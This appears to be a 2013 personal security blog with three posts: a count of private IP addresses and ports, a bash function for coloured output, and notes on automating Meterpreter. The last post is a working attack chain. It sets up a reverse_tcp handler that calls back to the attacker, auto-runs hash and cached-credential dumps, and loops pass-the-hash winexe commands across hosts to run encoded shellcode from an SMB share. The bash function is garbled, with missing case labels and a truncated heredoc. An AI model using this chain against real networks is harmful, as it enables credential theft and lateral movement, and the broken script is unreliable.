Wednesday, August 21, 2013

Number of Potential Ports in Private IP Space

So this is kind of interesting and it might be useful in the future.

The 10/8 network has 16,777,216 addresses

The 172.16/12 network has 1,048,576 addresses

The 192.168/16 network has 65,536 addresses

Combine those with 65,536 port numbers for TCP and the same for UDP and you get over 2.3 trillion (2,345,052,143,616) potential service endpoints.

So next time someone wants you to scan their private IP space, doesnt tell you what ranges there are and expects you to do it in 2 weeks, tell them to politely fuck off.

Thursday, August 15, 2013

echo colored text in bash

Lots of tutorials tell you to use the "echo -e [blahblah" ANSI escape sequences to generate the colors for output. First of all those are practically impossible to read easily, they look like magic, and its a bitch to try to find a typo.

tput was created a while ago to remedy those issues. I've created a function/script that can be included in other scripts to easily generate colors.
echo_color() {
 case ${1} in
  shift 1
  #echo $(COLOR)${user-supplied-text}$(NORMAL-COLOR)
  echo $(tput setaf 0)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 1)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 2)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 3)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 1)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 6)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 5)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 7)${*}$(tput sgr0)
  #yes i know its not a color, its still usefull though.
  shift 1
  echo $(tput setaf smul)${*}$(tput sgr0)
  shift 2
  echo $(tput setaf ${color_code})${*}$(tput sgr0)
  for i in $(seq 0 256); do 
  tput setaf ${i}
  printf " %3s" "$i"
  tput sgr0
  if [ $((($i + 1) % 16)) == 0 ] ; then
   echo #New line
  cat <
This script will echo your text as a specified color.

 $0 custom
 $0 ls-color-codes
echo_color $*
I'm particularly happy with my ls-color-codes argument, it will print a 16x16 box of the color codes and their colors.

Happy scripting!

Tuesday, August 13, 2013

Automating Meterpreter from bash

This is pretty disgusting and a stupidly unstable hackjob, but it worked and this blog is more for notes for myself anyway...

Generate the post-exploitation comand rc file:

cat > /root/automsf.rc
run post/windows/gather/smart_hashdump
run post/windows/gather/cachedump

Then run msfconsole to listen for the callback:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set AutoRunScript multi_console_command -rc /root/automsf.rc
expoit -j -z
 Then generate the payload to use with sce:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
 Then run the forloop while serving sce from a share
for i in `cat file-of-smb-hosts`; do 
echo grabbing $i; 
winexe-PTH -U 'DOM\user%password' --uninstall //$i 'cmd.exe /c \\\smb_share\sce.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI9lzHOys0uP30aplIKUfQn2QtNkf2vPNk0RdLlK0RftLK42Q86oMg1ZFFVQKOUayPLlElQqqlgrFL5piQXOdMGqzgxbHpaBCgLKV26pnkqR7LVaHPNk1PT8NeYP440J31zpbplKsx6xnkCha0uQiC8cGLBink4tNk7qIFp1io5aiPLlYQjodMwqO7GH9El45S1mIhEkQmtd1eZB3hnkchGTVaiC0fnkTL0KLKpXgluQkcnkwtlKC1xPLIRd14ddQKaKU1Ci1JCa9o9paHSopZNk7bXkmV3mE8FSTrWps0RH3Gt3p2copTBHPL47gVVgYoyEoHj0eQc0ePwYzdRtpPPhWYm; 

Now it should iterate through all of the IPs in the text file, executing sce from a share (no hard drive footprint) and executing the callback to your msfconsole listener. It then auto loads the rest of the payload, executes the .rc file, and exists. Rinse and repeat with the next IP